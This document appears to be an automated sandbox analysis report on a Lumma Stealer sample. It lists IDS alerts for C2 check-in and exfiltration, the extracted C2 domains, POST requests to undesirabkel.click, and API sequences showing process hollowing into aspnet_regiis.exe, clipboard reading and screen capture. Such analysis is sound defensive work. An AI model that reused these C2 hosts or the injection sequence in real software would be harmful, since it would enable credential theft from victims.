                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: undesirabkel.click
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IN8UF5IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6OYZR5SGAKWTWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4C4512I00S3LUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W9TUYLRPWIGHR58YBQ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1275Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L4TX8WMB2QKP1MQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587848Host: undesirabkel.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: undesirabkel.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1837352702.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/
                Source: aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796892734.0000000002B33000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/#
                Source: aspnet_regiis.exe, 00000002.00000003.1806587367.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810076497.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/a
                Source: aspnet_regiis.exe, 00000002.00000003.1806374282.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/api
                Source: aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/api:5
                Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiG5s_
                Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiL7
                Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apia7p_=
                Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apiam
                Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/apirs
                Source: aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click/d
                Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click:443/apiE
                Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://undesirabkel.click:443/apiK
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C2490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_027C2490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_04D31000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_04D31000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C2490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_027C2490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C2620 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_027C2620

                System Summary

                barindex
                Source: 9cOUjp7ybm.exeStatic PE information: section name: <qqo!9W
                Source: 9cOUjp7ybm.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE18870 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtReadVirtualMemory,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,0_2_6CE18870
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE17960 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CE17960
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F71400_2_003F7140
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F39B00_2_003F39B0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_00428A400_2_00428A40
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0042CAB00_2_0042CAB0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0040DB200_2_0040DB20
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F43B00_2_003F43B0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_004293900_2_00429390
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F63C00_2_003F63C0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D64280_2_003D6428
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F6CB00_2_003F6CB0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0041B4F00_2_0041B4F0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0040DDF00_2_0040DDF0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D6E630_2_003D6E63
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0041DE300_2_0041DE30
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F56A00_2_003F56A0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003F7F200_2_003F7F20
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0040F7C00_2_0040F7C0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D6FC70_2_003D6FC7
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE117C00_2_6CE117C0
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE188700_2_6CE18870
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE179600_2_6CE17960
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE155400_2_6CE15540
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE1ED300_2_6CE1ED30
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE110100_2_6CE11010
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_6CE291E10_2_6CE291E1
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0042ABC00_2_0042ABC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A52702_2_027A5270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B62702_2_027B6270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CFA602_2_027CFA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B2A282_2_027B2A28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027D02E02_2_027D02E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B32882_2_027B3288
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CBB602_2_027CBB60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C88902_2_027C8890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A21202_2_027A2120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0279A9B02_2_0279A9B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0279E6352_2_0279E635
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027986F02_2_027986F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0279D6C52_2_0279D6C5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BAF452_2_027BAF45
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B24ED2_2_027B24ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AECC02_2_027AECC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A627D2_2_027A627D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027942602_2_02794260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B3A502_2_027B3A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027992402_2_02799240
